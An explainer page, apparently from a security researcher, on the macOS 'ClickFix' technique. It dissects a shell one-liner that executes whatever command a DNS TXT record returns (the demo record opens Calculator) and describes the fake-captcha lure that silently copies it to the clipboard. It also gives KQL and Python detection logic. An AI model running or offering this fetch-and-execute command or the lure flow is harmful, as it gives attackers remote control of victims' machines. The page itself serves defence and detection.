Clickfix DNS (Mac)

Execute commands via DNS TXT records on macOS. The entire payload comes from DNS; nothing is hardcoded in the command itself.

Example command breakdown

The command below runs on macOS; each numbered segment is explained in turn.
$(dig +short TXT clickfix-dns-mac.intel.cx| tr -d '"')
1. Command substitution

   Starts command substitution. The output of the inner command will be executed as a shell command.

   $(

2. DNS TXT lookup

   Fetches the TXT record for the domain. The record contains the full payload: open -a Calculator.

   dig +short TXT clickfix-dns-mac.intel.cx

3. Strip quotes

   Removes the quotes that dig adds around TXT values to get a clean command string.

   | tr -d '"'

4. Close substitution

   Closes the command substitution. Whatever the TXT record contains is executed as a shell command.

   )
How it works
The attack chain from victim execution to payload delivery on macOS
  1. Victim runs the command

     The bash one-liner is presented on a fake “support” or “fix” page. The page copies the command to the clipboard, then prompts the victim to open Terminal (Cmd+Space, type “Terminal”, Enter), paste with Cmd+V, and press Enter to run.

  2. DNS TXT lookup

     dig +short TXT clickfix-dns-mac.intel.cx fetches the TXT record. It contains the full command: open -a Calculator.

  3. Execute

     tr -d '"' strips the quotes. Command substitution then runs whatever the TXT record contains: the payload is attacker-controlled and nothing is hardcoded in the one-liner.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • Seems legitimate. Victims are used to captchas and security checks online. A fake reCAPTCHA-style prompt feels familiar and trustworthy, lowering suspicion.
  • No hardcoded payload. The command contains no executable, script, or URL, only a domain name. Static analysis and signatures miss it.
  • Flexible execution. The DNS record can point to any command (e.g. open, curl, bash). The attacker decides at the DNS level.
  • Attacker-controlled at any time. Change the CNAME record and the same command now delivers a different payload. No need to redistribute links or documents.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to open Terminal (Cmd+Space), paste (Cmd+V), and press Enter. Note: the command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Hunting
Detection query (Microsoft Defender advanced hunting, KQL) for bash/dig DNS TXT execution. It is deliberately broad: a manual dig TXT check of an SPF record piped through tr also matches, so triage hits by whether the dig call is wrapped in command substitution.
// Broad hunt: a dig TXT lookup whose output is piped through tr (quote stripping)
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "dig"
  and ProcessCommandLine contains "TXT"
  and ProcessCommandLine contains "tr"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine
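As an added example that is not part of the original page, the following Python runs the same hunt over constructed DeviceProcessEvents-shaped rows and separates the high-confidence case, where dig sits inside command substitution so its TXT answer is executed, from the broad dig/TXT/tr match that a manual SPF lookup also produces. The sample rows, the severity labels and the helper names are assumptions made for this example.

```python
import re

# Constructed sample rows shaped like DeviceProcessEvents (not real telemetry).
SAMPLE_EVENTS = [
    {"Timestamp": "2024-05-01T09:12:00Z", "DeviceName": "mac-01", "AccountName": "alice",
     "ProcessCommandLine": "/bin/zsh -c $(dig +short TXT clickfix-dns-mac.intel.cx| tr -d '\"')"},
    # An admin checking an SPF record by hand: hits the broad KQL, but nothing gets executed.
    {"Timestamp": "2024-05-01T09:15:00Z", "DeviceName": "mac-02", "AccountName": "bob",
     "ProcessCommandLine": "dig +short TXT example.com | tr -d '\"'"},
]

# dig inside $( ... ) or backticks: whatever the TXT answer says becomes the command that runs.
SUBSTITUTED_DIG = re.compile(r"(\$\(|`)\s*(\S*/)?dig\b")
# The quote-stripping stage of the one-liner (tr -d '"').
STRIP_QUOTES = re.compile(r'\btr\s+-d\s+\S*"')


def parse_dig_txt(cmdline):
    """Return the name queried by a `dig ... TXT ...` invocation in cmdline, or None."""
    for segment in re.split(r"[|;&`]|\$\(|\)", cmdline):
        tokens = segment.split()
        names = [t.rsplit("/", 1)[-1] for t in tokens]
        if "dig" not in names:
            continue
        args = [a.strip("\"'") for a in tokens[names.index("dig") + 1:]]
        if not any(a.upper() == "TXT" for a in args):
            continue
        # dig accepts name and type in either order; skip +options, -flags and @server.
        targets = [a for a in args if a and a.upper() != "TXT" and a[0] not in "+-@"]
        if targets:
            return targets[0]
    return None


def classify(cmdline):
    """'high' when dig's TXT answer is executed via command substitution, 'low' when the
    line only matches the broad dig/TXT/tr hunt (typically a manual lookup), else None."""
    domain = parse_dig_txt(cmdline)
    if domain is None:
        return None
    substituted = SUBSTITUTED_DIG.search(cmdline) is not None
    severity = "high" if substituted else "low" if STRIP_QUOTES.search(cmdline) else None
    if severity is None:
        return None
    return {"domain": domain, "severity": severity, "executes_answer": substituted}


def hunt(events):
    """Apply classify() to DeviceProcessEvents-shaped rows and return enriched findings."""
    return [{**{k: ev[k] for k in ("Timestamp", "DeviceName", "AccountName")}, **f}
            for ev in events if (f := classify(ev["ProcessCommandLine"]))]
```

The extracted domain is what you would pivot on next (DNS logs for the same name, resolver blocking); the low-severity bucket is where most of the broad query's noise lands.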